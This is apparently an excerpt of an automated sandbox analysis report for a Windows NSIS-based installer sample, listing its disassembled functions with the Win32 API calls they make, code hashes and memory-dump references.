                                                                  • Opcode ID: 6d9cd5a565d063f7c871d931481108c2ccc59b6be6080685bd61ccbc84ff8956
                                                                  • Instruction ID: ed52d7626cbd5fe55056ecced6ac67fd73520a103458dc51ec5e44788bc33e0d
                                                                  • Opcode Fuzzy Hash: 6d9cd5a565d063f7c871d931481108c2ccc59b6be6080685bd61ccbc84ff8956
                                                                  • Instruction Fuzzy Hash: 6B1104518047A169FB3207380C40B7B7F888B97764F1A447FE8C6722C2C67C5CA796AD
                                                                  Function 004041E2 Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetWindowLongA.USER32(?,000000EB), ref: 004041FF
                                                                  • GetSysColor.USER32(00000000), ref: 0040423D
                                                                  • SetTextColor.GDI32(?,00000000), ref: 00404249
                                                                  • SetBkMode.GDI32(?,?), ref: 00404255
                                                                  • GetSysColor.USER32(?), ref: 00404268
                                                                  • SetBkColor.GDI32(?,?), ref: 00404278
                                                                  • DeleteObject.GDI32(?), ref: 00404292
                                                                  • CreateBrushIndirect.GDI32(?), ref: 0040429C
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2637585543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637631224.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637815169.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                  • String ID:
                                                                  • API String ID: 2320649405-0
                                                                  • Opcode ID: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                                                                  • Instruction ID: 212a8ad98d70f233ee07b83b669a1ba7ccffb4b50a3226e4c630c70d8ffb5278
                                                                  • Opcode Fuzzy Hash: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                                                                  • Instruction Fuzzy Hash: 3B2165716007059BCB309F78DD08B5BBBF4AF85750B04896EFD96A22E0C738E814CB54
                                                                  Function 6FF824D8 Relevance: 10.6, APIs: 7, Instructions: 124COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 6FF81215: GlobalAlloc.KERNEL32(00000040,6FF81233,?,6FF812CF,-6FF8404B,6FF811AB,-000000A0), ref: 6FF8121D
                                                                  • GlobalFree.KERNEL32(?), ref: 6FF825DE
                                                                  • GlobalFree.KERNEL32(00000000), ref: 6FF82618
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2668548574.000000006FF81000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FF80000, based on PE: true
                                                                  • Associated: 00000000.00000002.2666689682.000000006FF80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2668568921.000000006FF83000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2668596503.000000006FF85000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6ff80000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: Global$Free$Alloc
                                                                  • String ID:
                                                                  • API String ID: 1780285237-0
                                                                  • Opcode ID: 3460433c5056a7ccd8a12df1c7cac149597a3aa84a8d9c669a6bcc01959d36ed
                                                                  • Instruction ID: 83a4188ece960125968ea7dd996857b42ff7603fd2943421620f434d4c8d98c2
                                                                  • Opcode Fuzzy Hash: 3460433c5056a7ccd8a12df1c7cac149597a3aa84a8d9c669a6bcc01959d36ed
                                                                  • Instruction Fuzzy Hash: 50419D72148600EFDB018F68CD94D3A77BAEB87B18B004669F5719B360DB36B914CB62
                                                                  Function 0040521E Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(0042A070,00000000,00424248,76F923A0,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                                  • lstrlenA.KERNEL32(00403233,0042A070,00000000,00424248,76F923A0,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                                  • lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,00424248,76F923A0), ref: 0040527A
                                                                  • SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                                                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
                                                                  • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
                                                                  • SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2637585543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637631224.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637815169.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                  • String ID:
                                                                  • API String ID: 2531174081-0
                                                                  • Opcode ID: ffc7fd16b0850e8ca78275056b27aa311aff222ca9cd1cb1225c1906ca535124
                                                                  • Instruction ID: 52f605d016cfd88bb70700c5a478074e15cc738f975766ab4ed8c3314b346ff2
                                                                  • Opcode Fuzzy Hash: ffc7fd16b0850e8ca78275056b27aa311aff222ca9cd1cb1225c1906ca535124
                                                                  • Instruction Fuzzy Hash: C721AC71900518BBDF119FA5DD8599FBFA8EF04354F1480BAF804B6291C7798E50CF98
                                                                  Function 00404ACE Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404AE9
                                                                  • GetMessagePos.USER32 ref: 00404AF1
                                                                  • ScreenToClient.USER32(?,?), ref: 00404B0B
                                                                  • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404B1D
                                                                  • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404B43
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2637585543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637631224.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637815169.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: Message$Send$ClientScreen
                                                                  • String ID: f
                                                                  • API String ID: 41195575-1993550816
                                                                  • Opcode ID: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                                  • Instruction ID: cdc5f22e578355ebae6afd16dcadc4be4e42c2ab1ff41a6041c2d58f87c209b7
                                                                  • Opcode Fuzzy Hash: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                                  • Instruction Fuzzy Hash: 33014C71900219BADB01DBA4DD85BFEBBBCAF55715F10012ABA40B61D0D6B4A9018BA4
                                                                  Function 00402DBA Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DD5
                                                                  • MulDiv.KERNEL32(000D7516,00000064,000D8A80), ref: 00402E00
                                                                  • wsprintfA.USER32 ref: 00402E10
                                                                  • SetWindowTextA.USER32(?,?), ref: 00402E20
                                                                  • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402E32
                                                                  Strings
                                                                  • verifying installer: %d%%, xrefs: 00402E0A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2637585543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637631224.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637815169.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                                  • String ID: verifying installer: %d%%
                                                                  • API String ID: 1451636040-82062127
                                                                  • Opcode ID: 79fc7e6e1ca0acae8e9a75e18e021abc494deab029f93f770ff90eafb88ab8ab
                                                                  • Instruction ID: 65898b716c6b5e3943ed5d7f8865a7929710e3ce64d80c757a7a8fa3a9c1cc58
                                                                  • Opcode Fuzzy Hash: 79fc7e6e1ca0acae8e9a75e18e021abc494deab029f93f770ff90eafb88ab8ab
                                                                  • Instruction Fuzzy Hash: BD01FF70640209FBEF20AF60DE4AEEE3769AB14345F008039FA06A51D0DBB59D55DB59
                                                                  Function 6FF822F1 Relevance: 9.1, APIs: 6, Instructions: 140memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GlobalFree.KERNEL32(00000000), ref: 6FF82447
                                                                    • Part of subcall function 6FF81224: lstrcpynA.KERNEL32(00000000,?,6FF812CF,-6FF8404B,6FF811AB,-000000A0), ref: 6FF81234
                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 6FF823C2
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 6FF823D7
                                                                  • GlobalAlloc.KERNEL32(00000040,00000010), ref: 6FF823E8
                                                                  • CLSIDFromString.OLE32(00000000,00000000), ref: 6FF823F6
                                                                  • GlobalFree.KERNEL32(00000000), ref: 6FF823FD
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2668548574.000000006FF81000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FF80000, based on PE: true
                                                                  • Associated: 00000000.00000002.2666689682.000000006FF80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2668568921.000000006FF83000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2668596503.000000006FF85000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6ff80000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                                                                  • String ID:
                                                                  • API String ID: 3730416702-0
                                                                  • Opcode ID: 5266a61434d6dcdaae1651cf8ffa4e12ddd5f0fe7f4f5580eaf2d60de1c65e80
                                                                  • Instruction ID: b33707d6b1909aca93fdde82c3099bb5c9b9d5a9d0f05cbf5e0644d422e4f251
                                                                  • Opcode Fuzzy Hash: 5266a61434d6dcdaae1651cf8ffa4e12ddd5f0fe7f4f5580eaf2d60de1c65e80
                                                                  • Instruction Fuzzy Hash: 2941ACB2508700EFD7108F288984B6AB7F8FF42325F104A6AE475EB2A1D771B544CB62
                                                                  Function 004027DF Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402833
                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040284F
                                                                  • GlobalFree.KERNEL32(?), ref: 0040288E
                                                                  • GlobalFree.KERNEL32(00000000), ref: 004028A1
                                                                  • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 004028B9
                                                                  • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004028CD
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2637585543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637631224.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637815169.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                  • String ID:
                                                                  • API String ID: 2667972263-0
                                                                  • Opcode ID: e200f0a06a1b791de6fcd90df19bdd9ae0c902d0d002ce7977cb24af33c736ef
                                                                  • Instruction ID: 50ad9526884773a844389ca9465edd1da2989015e588fa45899e7f45ead5980e
                                                                  • Opcode Fuzzy Hash: e200f0a06a1b791de6fcd90df19bdd9ae0c902d0d002ce7977cb24af33c736ef
                                                                  • Instruction Fuzzy Hash: 78216D72800128BBDF217FA5CE49D9E7A79EF09364F24423EF550762D1CA794D418FA8
                                                                  Function 6FF81837 Relevance: 7.7, APIs: 5, Instructions: 194COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2668548574.000000006FF81000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FF80000, based on PE: true
                                                                  • Associated: 00000000.00000002.2666689682.000000006FF80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2668568921.000000006FF83000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2668596503.000000006FF85000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6ff80000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: FreeGlobal
                                                                  • String ID:
                                                                  • API String ID: 2979337801-0
                                                                  • Opcode ID: f3e013fd54757e667a64fa2938c096914dec913e7e0128b170989d604ce1a7a2
                                                                  • Instruction ID: a3aed1b1b0207c83014d4f85e4f354e94f6497fa4083eb5025759b3035ac63b0
                                                                  • Opcode Fuzzy Hash: f3e013fd54757e667a64fa2938c096914dec913e7e0128b170989d604ce1a7a2
                                                                  • Instruction Fuzzy Hash: 3C51E372D4429AEEDF108FB8C9846AEBBB5AF46359F0403DBD434E7250C771BA818761
                                                                  Function 00401D65 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetDlgItem.USER32(?,?), ref: 00401D7E
                                                                  • GetClientRect.USER32(?,?), ref: 00401DCC
                                                                  • LoadImageA.USER32(?,?,?,?,?,?), ref: 00401DFC
                                                                  • SendMessageA.USER32(?,00000172,?,00000000), ref: 00401E10
                                                                  • DeleteObject.GDI32(00000000), ref: 00401E20
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2637585543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637631224.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637815169.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                  • String ID:
                                                                  • API String ID: 1849352358-0
                                                                  • Opcode ID: 64047181dbb11954f6248d6d4ebce6329301936260590e1bb013e11241bca830
                                                                  • Instruction ID: ea2313c62ec258575502bac7b5a91221d1b2f7c42d1e166e88532b570a834240
                                                                  • Opcode Fuzzy Hash: 64047181dbb11954f6248d6d4ebce6329301936260590e1bb013e11241bca830
                                                                  • Instruction Fuzzy Hash: 02212872A00109AFCB15DFA4DD85AAEBBB5EB48300F24417EF905F62A1DB389941DB54
                                                                  Function 004049C4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(0042A890,0042A890,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004048DF,000000DF,00000000,00000400,?), ref: 00404A62
                                                                  • wsprintfA.USER32 ref: 00404A6A
                                                                  • SetDlgItemTextA.USER32(?,0042A890), ref: 00404A7D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2637585543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637631224.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637815169.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: ItemTextlstrlenwsprintf
                                                                  • String ID: %u.%u%s%s
                                                                  • API String ID: 3540041739-3551169577
                                                                  • Opcode ID: 5f94da5c7593bdf0e2880c0754fbf5196b9ea6ae0f0d3d8572f030c1a72350cb
                                                                  • Instruction ID: 22449cd78037b5055574fdfa12b268b27ceb02c465c900d7a820e94443fbddbc
                                                                  • Opcode Fuzzy Hash: 5f94da5c7593bdf0e2880c0754fbf5196b9ea6ae0f0d3d8572f030c1a72350cb
                                                                  • Instruction Fuzzy Hash: 1911E773A041243BDB00A56D9C41EAF3298DF81374F260237FA26F71D1E979CC1246A9
                                                                  Function 00405A8F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403335,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405A95
                                                                  • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403335,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405A9E
                                                                  • lstrcatA.KERNEL32(?,0040A014,?,00000007,00000009,0000000B), ref: 00405AAF
                                                                  Strings
                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A8F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2637585543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637631224.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637815169.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: CharPrevlstrcatlstrlen
                                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                                  • API String ID: 2659869361-297319885
                                                                  • Opcode ID: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                                                                  • Instruction ID: 6078a555604e81c1816c45b3e60b5c3e7c31ed84b02af53c952a19e53ba35867
                                                                  • Opcode Fuzzy Hash: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                                                                  • Instruction Fuzzy Hash: 68D0A7B26055307AE21126155C06ECB19488F463447060066F500BB193C77C4C114BFD
                                                                  Function 00402E3D Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • DestroyWindow.USER32(00000000,00000000,0040301B,00000001), ref: 00402E50
                                                                  • GetTickCount.KERNEL32 ref: 00402E6E
                                                                  • CreateDialogParamA.USER32(0000006F,00000000,00402DBA,00000000), ref: 00402E8B
                                                                  • ShowWindow.USER32(00000000,00000005), ref: 00402E99
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2637585543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637631224.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637815169.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                  • String ID:
                                                                  • API String ID: 2102729457-0
                                                                  • Opcode ID: 8c1e1bd8efa9ab411d4161537fee885c8283498bc89c51da2617a800704498c9
                                                                  • Instruction ID: cc5f9dcce599e9be0c1e5b41ef6f72156ec830c1ee92694e4cf82ced2ffe4824
                                                                  • Opcode Fuzzy Hash: 8c1e1bd8efa9ab411d4161537fee885c8283498bc89c51da2617a800704498c9
                                                                  • Instruction Fuzzy Hash: B6F05E30A45630EBC6317B64FE4CA8B7B64BB44B45B91047AF045B22E8C6740C83CBED
                                                                  Function 00405B7D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 004060F7: lstrcpynA.KERNEL32(?,?,00000400,0040341A,datastrrelsers Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 00406104
                                                                    • Part of subcall function 00405B28: CharNextA.USER32(?,?,0042BC98,?,00405B94,0042BC98,0042BC98,76F93410,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,76F93410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B36
                                                                    • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B3B
                                                                    • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B4F
                                                                  • lstrlenA.KERNEL32(0042BC98,00000000,0042BC98,0042BC98,76F93410,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,76F93410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405BD0
                                                                  • GetFileAttributesA.KERNEL32(0042BC98,0042BC98,0042BC98,0042BC98,0042BC98,0042BC98,00000000,0042BC98,0042BC98,76F93410,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,76F93410,C:\Users\user\AppData\Local\Temp\), ref: 00405BE0
                                                                  Strings
                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B7D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2637585543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637631224.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
